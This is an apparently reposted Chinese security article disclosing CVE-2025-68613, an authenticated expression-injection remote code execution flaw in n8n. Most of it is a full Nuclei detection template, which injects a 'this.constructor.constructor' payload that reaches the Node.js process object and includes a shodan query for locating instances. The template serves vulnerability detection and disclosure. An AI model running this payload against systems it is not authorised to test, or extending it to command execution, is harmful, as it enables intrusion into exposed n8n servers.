文章总结: 本文档披露了CVE-2025-68613漏洞,该漏洞位于n8n自动化平台中,CVSS评分10.0。攻击者利用表达式注入可访问Node.js全局上下文,从而实现远程代码执行。文中提供了完整的Nuclei检测脚本POC,建议管理员及时修复并排查受影响版本。 综合评分: 92 文章分类: 漏洞POC,漏洞分析,漏洞预警,WEB安全,红队
CVE-2025-68613 n8n 表达式注入导致远程代码执行(RCE CVSS 10.0)
TtTeam
2025年12月23日 01:15 日本
CVE-2025-68613 – n8n – 表达式注入导致远程代码执行 (RCE)
id: CVE-2025-68613
info: name: n8n Expression Injection Remote Code Execution author: PentesterFlow Team severity: critical description: | Detects Expression Injection vulnerability in n8n that allows authenticated users to access Node.js global context via expressions, leading to Remote Code Execution. reference: - https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp classification: cvss-score: 10.0 cve-id: CVE-2025-68613 metadata: verified: true product: n8n vendor: n8n shodan-query: http.title:"n8n" tags: cve, n8n, rce, expression-injection, authenticated
variables: workflow_name: nuclei-test-{{randstr}}
http: - raw: - | POST /rest/workflows HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Authorization: Bearer {{token}}
{ "name": "{{workflow_name}}", "nodes": [ { "parameters": { "value": "={{this.constructor.constructor('return process')().platform}}" }, "name": "Set", "type": "n8n-nodes-base.set", "typeVersion": 2, "position": [250, 300] } ], "connections": {} }
- | POST /rest/workflows/{{workflow_id}}/run HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Authorization: Bearer {{token}}
{}
extractors: - type: json name: workflow_id json: - ".id" internal: true
matchers-condition: and matchers: - type: word part: body words: - linux - win32 - darwin
- type: status status: - 200
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:TtTeam 《CVE-2025-68613 n8n 表达式注入导致远程代码执行(RCE CVSS 10.0)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论